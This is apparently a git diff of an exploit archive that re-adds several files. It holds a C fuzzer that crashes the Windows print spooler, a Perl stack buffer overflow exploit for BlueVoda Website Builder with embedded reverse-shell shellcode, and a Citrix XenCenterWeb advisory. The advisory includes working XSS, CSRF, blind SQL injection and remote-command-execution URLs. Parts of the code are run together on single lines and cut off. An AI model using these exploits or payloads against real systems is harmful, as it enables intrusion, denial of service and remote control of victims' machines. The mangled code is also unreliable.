atarasco@514.es - url: http://www.514.es - - This is an intial version of EnumPrinter() and OpenPrinter() fuzzer. I hope that - it will help to identify similar vulnerabilities. - Tested against win2k3 + Citrix presentation server. If the system is vulnerable - this application will kill spooler service (spoolsv.exe ) and ret will be overwritten - with 0x00410041 - - 514 Tiger Team ownz u - - */ -#include -#include -#include -#pragma comment(lib,"Winspool.lib") - - -void usage(char *name) { - printf("Usage: %s -a (Ascii fuzzing for local printer providers)\n",name); - printf("Usage: %s -u (Unicode fuzzing for local printer providers)\n",name); - exit(0); -} - -#define RECURSIVE 1 -#define OPT_UNICODE 2 -#define MAX_PRINTER_LEN 4096 - -#define _DBG_ -#undef _DBG_ - -int CustomFuzzSize[]= {25,50,100,150,250,300,500,1000,1500, 2000}; -wchar_t dst[MAX_PRINTER_LEN]; - - - -void Fuzzer( wchar_t *orig,int opt, int unicode) { - int i,j; - int len; - - if (unicode) len=wcslen(orig); - else len=strlen((char *)orig); - memset((char *)dst,'\0',sizeof(dst)); - memcpy((char *)dst,orig,len*(1+unicode)); - j=wcslen(orig); - for(i=0;i +#include +#include +#pragma comment(lib,"Winspool.lib") + + +void usage(char *name) { + printf("Usage: %s -a (Ascii fuzzing for local printer providers)\n",name); + printf("Usage: %s -u (Unicode fuzzing for local printer providers)\n",name); + exit(0); +} + +#define RECURSIVE 1 +#define OPT_UNICODE 2 +#define MAX_PRINTER_LEN 4096 + +#define _DBG_ +#undef _DBG_ + +int CustomFuzzSize[]= {25,50,100,150,250,300,500,1000,1500, 2000}; +wchar_t dst[MAX_PRINTER_LEN]; + + + +void Fuzzer( wchar_t *orig,int opt, int unicode) { + int i,j; + int len; + + if (unicode) len=wcslen(orig); + else len=strlen((char *)orig); + memset((char *)dst,'\0',sizeof(dst)); + memcpy((char *)dst,orig,len*(1+unicode)); + j=wcslen(orig); + for(i=0;i Site : 1337day.com | 1 +1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0 +0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1 +1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0 +0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1 +1 _ ) \_______\__|IIIIII|__/_______________________ 0 +0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1 +1 )_/ \ / 0 +0 (@ `--------` . 2011, Inj3ct0r Team 1 +1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 +0 BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow 1 +1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 +'; +} +# --------- +# BlueVoda Website Builder v.11 (.bvp) Stack Buffer Overflow +# Author : KedAns-Dz +# special thanks to : Inj3ct0r Team + Exploit-Id Team +# Tested in Windows XP sp3 France +# --------- +logo(); +my $header = # BlueVoda Project (bvp) Header +"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09"; +my $jump = "\xeb\x02\x90\x90" ; # short jump - from BlueVoda.exe +my $call = "\xff\x52\x7c"; # Call - from BlueVoda.exe +my $junk = "\x41" x 321; # Buffer +my $nops = "\x90" x 51; # Nopsled +# windows/shell_reverse_tcp - 340 bytes (http://www.metasploit.com) +# LHOST=127.0.0.1, LPORT=4444, Encoder: x86/call4_dword_xor +my $shell = +"\x29\xc9\x83\xe9\xb1\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" . +"\x0e\x4e\x5a\xfa\xc3\x83\xee\xfc\xe2\xf4\xb2\xb2\x73\xc3" . +"\x4e\x5a\x9a\x4a\xab\x6b\x28\xa7\xc5\x08\xca\x48\x1c\x56" . +"\x71\x91\x5a\xd1\x88\xeb\x41\xed\xb0\xe5\x7f\xa5\xcb\x03" . +"\xe2\x66\x9b\xbf\x4c\x76\xda\x02\x81\x57\xfb\x04\xac\xaa" . +"\xa8\x94\xc5\x08\xea\x48\x0c\x66\xfb\x13\xc5\x1a\x82\x46" . +"\x8e\x2e\xb0\xc2\x9e\x0a\x71\x8b\x56\xd1\xa2\xe3\x4f\x89" . +"\x19\xff\x07\xd1\xce\x48\x4f\x8c\xcb\x3c\x7f\x9a\x56\x02" . +"\x81\x57\xfb\x04\x76\xba\x8f\x37\x4d\x27\x02\xf8\x33\x7e" . +"\x8f\x21\x16\xd1\xa2\xe7\x4f\x89\x9c\x48\x42\x11\x71\x9b" . +"\x52\x5b\x29\x48\x4a\xd1\xfb\x13\xc7\x1e\xde\xe7\x15\x01" . +"\x9b\x9a\x14\x0b\x05\x23\x16\x05\xa0\x48\x5c\xb1\x7c\x9e" . +"\x26\x69\xc8\xc3\x4e\x32\x8d\xb0\x7c\x05\xae\xab\x02\x2d" . +"\xdc\xc4\xb1\x8f\x42\x53\x4f\x5a\xfa\xea\x8a\x0e\xaa\xab" . +"\x67\xda\x91\xc3\xb1\x8f\xaa\x93\x1e\x0a\xba\x93\x0e\x0a" . +"\x92\x29\x41\x85\x1a\x3c\x9b\xd3\x3d\xab\x31\x5a\xfa\xc2" . +"\x26\x58\xfa\xd2\x12\xd3\x1c\xa9\x5e\x0c\xad\xab\xd7\xff" . +"\x8e\xa2\xb1\x8f\x92\xa0\x23\x3e\xfa\x4a\xad\x0d\xad\x94" . +"\x7f\xac\x90\xd1\x17\x0c\x18\x3e\x28\x9d\xbe\xe7\x72\x5b" . +"\xfb\x4e\x0a\x7e\xea\x05\x4e\x1e\xae\x93\x18\x0c\xac\x85" . +"\x18\x14\xac\x95\x1d\x0c\x92\xba\x82\x65\x7c\x3c\x9b\xd3" . +"\x1a\x8d\x18\x1c\x05\xf3\x26\x52\x7d\xde\x2e\xa5\x2f\x78" . +"\xbe\xef\x58\x95\x26\xfc\x6f\x7e\xd3\xa5\x2f\xff\x48\x26" . +"\xf0\x43\xb5\xba\x8f\xc6\xf5\x1d\xe9\xb1\x21\x30\xfa\x90" . +"\xb1\x8f\xfa\xc3"; +my $exploit = $header.$jump.$junk.$call.$shell.$nops; +open(myfile,'>>KedAns.bvp'); +print myfile $exploit; +close (myfile); + diff --git a/platforms/windows/remote/9106.txt b/platforms/windows/remote/9106.txt index 3813ffcca..3bbf99d15 100755 --- a/platforms/windows/remote/9106.txt +++ b/platforms/windows/remote/9106.txt @@ -1,151 +1,151 @@ -Secure Network - Security Research Advisory - -Vuln name: Citrix XenCenterWeb Multiple Vulnerabilities -Systems affected: Citrix XenCenterWeb -Systems not affected: n/a -Severity: High -Local/Remote: Remote -Vendor URL: http://www.citrix.com -Author(s): Alberto Trivero a.trivero@securenetwork.it - - Claudio Criscione c.criscione@securenetwork.it -Vendor disclosure: 1/06/2009 -Vendor acknowledged: 11/06/2009 -Vendor patch release: n/a -Public disclosure: 06/07/2009 -Advisory number: SN-2009-01 -Advisory URL: http://securenetwork.it/ricerca/advisory/download/SN-2009-01.txt - - -*** SUMMARY *** - -Citrix XenCenterWeb is a web interface for Citrix XenServer environment -management. -Users of XenCenterWeb will be able to see a list of Virtual Machines in the -Resource Pool, perform life-cycle actions (start, shutdown, restart, etc.), -get basic information about the hosts in the Resource Pools, information about -the VMs and also connect to the console of the VMs. - -Due to poor validation of some user controlled inputs, a variety of attacks -against the application and the underlying server are possible. -Cross-site scripting, cross-site request forgery, SQL injection and remote -command execution attack vectors were identified as well. - -XSS and CSRF attacks can be performed on the virtual appliance itself, while -the others require the PHP parameter magic_quotes_gpc to be off on the web -server. - -*** VULNERABILITY DETAILS *** - -(a) Cross-site Scripting (XSS) and Cross-site Request Forgery (CSRF) -With the default PHP configuration (register_globals=Off and -magic_quotes_gpc=On), both XSS and CSRF attacks can be executed. - -The first XSS attack exploits the lack of sanitization in the username -parameter in edituser.php script and requires the victim to be able to access -configuration scripts: -https://xencenterweb.loc/config/edituser.php?username=1 - -Under the same conditions, a CSRF attack can be executed to change the -password of an arbitrary user: -https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd] - -Another CSRF attack can hard stop a VM of the attacker's choice: -https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname] - -Other XSS vulnerabilities afflict scripts which are accessible by anyone: -https://xencenterweb.loc/console.php?location=1"><"&vmname=myVM -https://xencenterweb.loc/console.php?location=1&sessionid=1"><"&vmname=myVM -https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM -https://xencenterweb.loc/forcerestart.php?vmrefid=1"><"&vmname=myVM -https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><" -https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><" -https://xencenterweb.loc/forcesd.php?vmrefid=1"><"&vmname=myVM - -(b) SQL Injection -The username parameter in the login.php script is vulnerable to a Blind SQL -Injection attack. -An attacker can retrieve the whole database schema through specially crafted -requests. -Here is an example proof of concept: -https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE -'root@%', benchmark(1000000,sha1('test')), 'false')/* -Obviously, other high profile attacks can be performed through this attack -vector. - -(c) Remote Command Execution -An attacker could write arbitrary data in the file -/usr/local/lib/php/include/config.ini.php -through the file /var/www/config/writeconfig.php. Due to this unsecure behavior, -arbitrary commands can be executed on the machine. -If a victim with the proper authorization follows this link: -https://xencenterweb.loc/config/writeconfig.php?pool1='; ?> alert(document.cookie) + +Under the same conditions, a CSRF attack can be executed to change the +password of an arbitrary user: +https://xencenterweb.loc/config/changepw.php?username=[victim_username]&newpass=[attacker's_chosen_pwd] + +Another CSRF attack can hard stop a VM of the attacker's choice: +https://xencenterweb.loc/hardstopvm.php?stop_vmref=[VMref]&stop_vmname=[VMname] + +Other XSS vulnerabilities afflict scripts which are accessible by anyone: +https://xencenterweb.loc/console.php?location=1"><"&vmname=myVM +https://xencenterweb.loc/console.php?location=1&sessionid=1"><"&vmname=myVM +https://xencenterweb.loc/console.php?location=1&sessionid=1&vmname=myVM +https://xencenterweb.loc/forcerestart.php?vmrefid=1"><"&vmname=myVM +https://xencenterweb.loc/forcerestart.php?vmrefid=1&vmname=myVM"><" +https://xencenterweb.loc/forcesd.php?vmrefid=1&vmname=myVM"><" +https://xencenterweb.loc/forcesd.php?vmrefid=1"><"&vmname=myVM + +(b) SQL Injection +The username parameter in the login.php script is vulnerable to a Blind SQL +Injection attack. +An attacker can retrieve the whole database schema through specially crafted +requests. +Here is an example proof of concept: +https://xencenterweb.loc/login.php?username=user' UNION SELECT if(user() LIKE +'root@%', benchmark(1000000,sha1('test')), 'false')/* +Obviously, other high profile attacks can be performed through this attack +vector. + +(c) Remote Command Execution +An attacker could write arbitrary data in the file +/usr/local/lib/php/include/config.ini.php +through the file /var/www/config/writeconfig.php. Due to this unsecure behavior, +arbitrary commands can be executed on the machine. +If a victim with the proper authorization follows this link: +https://xencenterweb.loc/config/writeconfig.php?pool1='; ?>